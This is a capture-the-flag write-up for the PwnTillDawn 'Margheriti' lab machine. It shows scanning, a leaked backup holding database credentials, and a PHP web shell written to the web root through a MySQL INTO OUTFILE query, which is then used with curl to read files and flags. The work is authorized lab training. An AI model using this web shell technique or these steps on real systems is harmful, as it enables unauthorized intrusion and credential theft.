ptd-margheriti-server-private

.

.

As Always we start with a nmap scan.

E:\PENTEST\NMAP>nmap -A 10.150.150.145
Starting Nmap 7.70 ( https://nmap.org ) at 2021-02-05 11:06 W. Europe Standard Time
Nmap scan report for 10.150.150.145
Host is up (0.031s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
| ssh-hostkey:
| 2048 65:cc:32:50:bb:af:b4:8a:be:ff:b1:39:3c:dd:2c:e9 (RSA)
| 256 f9:db:6f:49:63:d7:db:dd:42:42:86:36:c5:31:b1:07 (ECDSA)
|_ 256 8e:74:a9:e3:fd:74:0c:c2:f7:14:85:81:a6:ba:fc:ce (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 4.9.12
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: e-corp – Just another WordPress site
3306/tcp open mysql MySQL 5.5.5-10.1.26-MariaDB-0+deb9u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.1.26-MariaDB-0+deb9u1
| Thread ID: 33
| Capabilities flags: 63487
| Some Capabilities: ODBCClient, IgnoreSigpipes, SupportsTransactions, DontAllowDatabaseTableColumn, FoundRows, LongColumnFlag, SupportsLoadDataLocal, Support41Auth, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, InteractiveClient, SupportsCompression, LongPassword, Speaks41ProtocolOld, ConnectWithDatabase, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: (TQy0!PQ&h[pA3{54D92
|_ Auth Plugin Name: 103
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4.26
OS details: Linux 2.4.26 (Slackware 10.0.0)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 ...
2 31.00 ms 10.150.150.145

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.36 seconds

E:\PENTEST\NMAP>

.

Then we gobuster it on extention zip

┌─[user@parrot-virtual]─[~/ptd]
└──╼ $dirb http://10.150.150.145 -X .zip -w /usr/share/dirb/wordlists/common.txt

-----------------
DIRB v2.22 
By The Dark Raver
-----------------

START_TIME: Fri Feb 5 12:06:25 2021
URL_BASE: http://10.150.150.145/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Stopping on warning messages
EXTENSIONS_LIST: (.zip) | (.zip) [NUM = 1]

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.150.150.145/ ----
+ http://10.150.150.145/backup.zip (CODE:200|SIZE:10187627) 

-----------------
END_TIME: Fri Feb 5 12:09:38 2021
DOWNLOADED: 4612 - FOUND: 1
┌─[user@parrot-virtual]─[~/ptd]

we find: http://10.150.150.145/backup.zip
FLAG14 is inhere = e804bb2ca0c3d89ae027de4d86246130d9e3252c
and in wp-config in this zip is
/** MySQL database username */
define(‘DB_USER’, ‘wpmaster’);

/** MySQL database password */
define(‘DB_PASSWORD’, ‘-!UlTr4S3cUr3P455W0rd-!‘);

3306/tcp open mysql on 10.150.150.14
dbeaver to it

in tables=FLAG32_a40987757b60acc87e80196c757f2a19c8acc3b5
found for username eadmin : $P$B2auwafsSB05anAeWeHLNnAlk2hZLg1

tried hashcat

E:\PENTEST\hashcat>hashcat64.exe -O -m 400 -a 0 -o cracked.txt target_hashes.txt rockyou.txt –force
hashcat (v5.1.0) starting…

=> nothing found

Next inserted a web shell in sql

SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/cmd.php"

.

E:\PENTEST>curl http://10.150.150.145/cmd.php?cmd=ls
WordPress-Account.txt
backup.zip
c.php
cmd.php
conf
hallo.txt
hoi.txt
index.php
license.txt
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php

E:\PENTEST>
E:\PENTEST>curl http://10.150.150.145/cmd.php?cmd=cat%20WordPress-Account.txt
user: eAdmin
password: 9r*WNyK7GUJ($bwi8G

E:\PENTEST>

We login to the wordpress site as user eadmin, and we find there

FLAG23=8ea0d06e16bccc89922bf674d7a90297a5316fda — Draft

find . -iname “FLAG*”
=>

E:\PENTEST>curl  http://10.150.150.145/cmd.php?cmd=find%20.%20-iname%20%22FLAG*%22
./wp-content/uploads/FLAG22.txt

.

http://10.150.150.145/wp-content/uploads/
=> found flag22 = 723d1a71be3d744bf84d9683c8df84f0fd916977
E:\PENTEST>curl http://10.150.150.145/cmd.php?cmd=find%20/%20-iname%20%22FLAG*%22
/home/webmaster/FLAG6.txt
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/ens33/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/virtual/net/lo/flags
/var/www/html/wp-content/uploads/FLAG22.txt
/proc/sys/kernel/sched_domain/cpu0/domain0/flags
/proc/sys/kernel/sched_domain/cpu1/domain0/flags

E:\PENTEST>
E:\PENTEST>curl http://10.150.150.145/cmd.php?cmd=cat%20/home/webmaster/FLAG6.txt%20/
6340427478524495dd30102486948aa7e01ae4d1

E:\PENTEST>

.

Reference how/where i uploaded a webshell

SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/cmd.php"


.

Write-ups have been authorized for this machine by the PwnTillDawn Crew! We are just asking you to give us credit by adding a backlink to https://www.wizlynxgroup.com/ and https://online.pwntilldawn.com/ in your write-up.

Author : Puckiestyle

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *